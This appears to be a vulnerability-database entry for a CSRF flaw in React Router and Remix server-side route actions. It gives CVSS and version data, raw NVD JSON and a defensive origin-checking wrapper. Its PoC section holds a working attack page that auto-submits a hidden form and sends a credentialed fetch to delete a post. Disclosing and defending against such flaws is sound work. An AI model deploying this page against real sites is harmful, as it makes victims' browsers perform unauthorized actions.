Security Vulnerability Report
CVE-2026-22030 CVSS 6.5 MEDIUM

Published: 2026-01-10 03:15:49
Last Modified: 2026-02-05 20:51:29

Description

React Router is a router for React. In @remix-run/server-runtime versions prior to 2.17.3 and react-router 7.0.0 through 7.11.0, React Router (or Remix v2) is vulnerable to CSRF attacks on document POST requests to UI routes when using server-side route action handlers in Framework Mode, or when using React Server Actions in the new unstable RSC modes. There is no impact if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/server-runtime version 2.17.3 and react-router version 7.12.0.
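The advisory describes a browser navigation (a document POST, such as an auto-submitted form on another site) reaching a server-side route action with the victim's cookies attached. The block below is an added illustration written for this page, not React Router's 7.12.0 or @remix-run/server-runtime 2.17.3 patch: a provenance check an application can place in front of an action so that cross-site state-changing requests are refused before the action body runs. It uses the Sec-Fetch-Site header where a browser sends one and falls back to Origin, then Referer. It assumes Node 18+ for the global Headers and Response classes; APP_ORIGIN, ACTION_URL, makeRequest and sampleRequests are constructed placeholders, not data from the advisory.

```javascript
// Added example for this page (not React Router's or Remix's own code):
// a server-side provenance check that rejects cross-site state-changing
// requests before a route action runs. Assumes Node 18+ (global Headers and
// Response). Origins, URLs and sample requests below are constructed.

const STATE_CHANGING = new Set(['POST', 'PUT', 'PATCH', 'DELETE']);

// Origin ("scheme://host[:port]") of a URL string, or null if unparseable.
function originOf(url) {
  try {
    return new URL(url).origin;
  } catch {
    return null;
  }
}

// Decide whether `request` may reach the action. Only `request.method` and
// `request.headers.get()` are used, so a real Fetch Request works here.
// `expectedOrigin` is the origin the app is served from (deployer-configured).
function csrfDecision(request, expectedOrigin) {
  const method = request.method.toUpperCase();
  if (!STATE_CHANGING.has(method)) {
    return { allowed: true, reason: 'safe method' };
  }

  // 1. Fetch Metadata: modern browsers label where each request came from.
  const site = request.headers.get('sec-fetch-site');
  if (site === 'same-origin' || site === 'none') {
    return { allowed: true, reason: `sec-fetch-site=${site}` };
  }
  if (site === 'cross-site' || site === 'same-site') {
    // same-site (a sibling subdomain) is rejected too; a compromised sibling
    // host could otherwise forge requests.
    return { allowed: false, reason: `sec-fetch-site=${site}` };
  }

  // 2. No Fetch Metadata (older browser): fall back to Origin, then Referer.
  //    Browsers attach Origin to every POST, so a mismatch is decisive.
  const origin = request.headers.get('origin');
  if (origin !== null) {
    return origin === expectedOrigin
      ? { allowed: true, reason: 'origin matches' }
      : { allowed: false, reason: `origin ${origin} != ${expectedOrigin}` };
  }
  const refOrigin = originOf(request.headers.get('referer') ?? '');
  if (refOrigin !== null) {
    return refOrigin === expectedOrigin
      ? { allowed: true, reason: 'referer origin matches' }
      : { allowed: false, reason: `referer origin ${refOrigin} != ${expectedOrigin}` };
  }

  // 3. No provenance at all (script client, or a proxy stripped the headers):
  //    fail closed rather than guess.
  return { allowed: false, reason: 'no origin information' };
}

// Wrap a Remix/React Router-style action(args) so a denied request gets a 403
// before the action body runs. `args.request` is the incoming Fetch Request.
function protectAction(action, expectedOrigin) {
  return async (args) => {
    const decision = csrfDecision(args.request, expectedOrigin);
    if (!decision.allowed) {
      return new Response(`Forbidden: ${decision.reason}`, { status: 403 });
    }
    return action(args);
  };
}

// ---- Constructed sample traffic (hypothetical app, not captured data) ----
const APP_ORIGIN = 'https://target-app.example';
const ACTION_URL = `${APP_ORIGIN}/posts/12345/delete`;
const FORM = 'application/x-www-form-urlencoded';

// Minimal stand-in for the Request object a framework hands to an action.
function makeRequest(method, headers) {
  return { method, url: ACTION_URL, headers: new Headers(headers) };
}

function sampleRequests() {
  return {
    // Document POST from an auto-submitted form on another site.
    crossSiteForm: makeRequest('POST', {
      'content-type': FORM, origin: 'https://attacker.example',
      'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document',
    }),
    // The same form submitted from the app's own page.
    sameOriginForm: makeRequest('POST', {
      'content-type': FORM, origin: APP_ORIGIN,
      'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document',
    }),
    // Older browser: no Fetch Metadata, but Origin is present.
    legacyCrossSite: makeRequest('POST', { 'content-type': FORM, origin: 'https://attacker.example' }),
    // Older browser, same origin, only Referer available.
    legacyReferer: makeRequest('POST', { 'content-type': FORM, referer: `${APP_ORIGIN}/posts/12345` }),
    // Plain navigation: not state-changing, so never blocked.
    pageLoad: makeRequest('GET', { 'sec-fetch-site': 'cross-site' }),
    // Script client with no provenance headers at all.
    bareClient: makeRequest('POST', { 'content-type': FORM }),
  };
}

for (const [name, req] of Object.entries(sampleRequests())) {
  console.log(name.padEnd(16), csrfDecision(req, APP_ORIGIN));
}
```

Upgrading to the patched versions is the actual fix; a check like this is defense in depth for the window before the upgrade lands. Note that it fails closed for clients that send none of Sec-Fetch-Site, Origin or Referer, so non-browser API clients that do not rely on cookies need their own route rather than an exemption here.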

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:shopify:remix-run\/react:*:*:*:*:*:node.js:*:* - VULNERABLE
@remix-run/server-runtime < 2.17.3
react-router 7.0.0
react-router 7.0.1
react-router 7.1.0
react-router 7.2.0
react-router 7.3.0
react-router 7.4.0
react-router 7.5.0
react-router 7.6.0
react-router 7.7.0
react-router 7.8.0
react-router 7.9.0
react-router 7.10.0
react-router 7.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2026-22030 PoC: CSRF Attack on React Router Framework Mode -->
<!-- Attacker hosts this page to exploit the CSRF vulnerability -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF PoC - CVE-2026-22030</title>
</head>
<body>
  <h1>Malicious Page - Do Not Visit</h1>

  <!-- Auto-submit form targeting vulnerable React Router action -->
  <form id="csrfForm" action="https://target-app.com/api/action/delete-post" method="POST" style="display:none;">
    <!-- CSRF vulnerable endpoint - Framework Mode UI route action -->
    <input type="hidden" name="_action" value="deletePost">
    <input type="hidden" name="postId" value="12345">
    <input type="hidden" name="authenticity_token" value="">
  </form>

  <script>
    // Auto-submit when page loads
    document.addEventListener('DOMContentLoaded', function() {
      // Simulate CSRF attack - form auto-submission
      // Browser will automatically include user's cookies
      document.getElementById('csrfForm').submit();

      // Alternative: Fetch API with credentials
      fetch('https://target-app.com/api/action/delete-post', {
        method: 'POST',
        mode: 'no-cors',        // request is still sent; only the response is opaque
        credentials: 'include', // Include cookies
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: '_action=deletePost&postId=12345'
      });
    });
  </script>

  <p>If you see this, the attack has been launched.</p>
</body>
</html>
<!-- Explanation:
  - The form auto-submits when the victim visits this page
  - Browser includes victim's session cookies automatically
  - no-cors mode does not bypass CORS: the form-encoded POST qualifies as a simple
    request, so it is sent, but the response is opaque and cannot be read
  - Target application must be using Framework Mode with UI routes
  - This PoC demonstrates how an attacker can trigger unauthorized actions
-->

References

https://github.com/remix-run/react-router/security/advisories/GHSA-h5cw-625j-3rxh (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22030",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T03:15:49.067",
    "lastModified": "2026-02-05T20:51:29.483",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "React Router is a router for React. In @remix-run/server-runtime version prior to 2.17.3. and react-router 7.0.0 through 7.11.0, React Router (or Remix v2) is vulnerable to CSRF attacks on document POST requests to UI routes when using server-side route action handlers in Framework Mode, or when using React Server Actions in the new unstable RSC modes. There is no impact if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/server-runtime version 2.17.3 and react-router version 7.12.0."
      },
      {
        "lang": "es",
        "value": "React Router es un router para React. En la versión de @remix-run/server-runtime anterior a la 2.17.3. y react-router 7.0.0 hasta la 7.11.0, React Router (o Remix v2) es vulnerable a ataques CSRF en solicitudes POST de documentos a rutas de interfaz de usuario cuando se utilizan manejadores de acciones de ruta del lado del servidor en Modo Framework, o cuando se utilizan Acciones de Servidor de React en los nuevos modos RSC inestables. No hay impacto si se utiliza el Modo Declarativo (<BrowserRouter>) o el Modo de Datos (createBrowserRouter/<RouterProvider>). Este problema ha sido parcheado en la versión 2.17.3 de @remix-run/server-runtime y la versión 7.12.0 de react-router."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-346" },
          { "lang": "en", "value": "CWE-352" }
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-352" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndIncluding": "7.11.0",
                "matchCriteriaId": "6928DE33-6137-4682-8610-1A6646F1B2A5"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:shopify:remix-run\\/react:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "2.17.3",
                "matchCriteriaId": "CD7006C4-2033-446C-A472-DAD51EB06396"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/remix-run/react-router/security/advisories/GHSA-h5cw-625j-3rxh",
        "source": "[email protected]",
        "tags": [ "Vendor Advisory" ]
      }
    ]
  }
}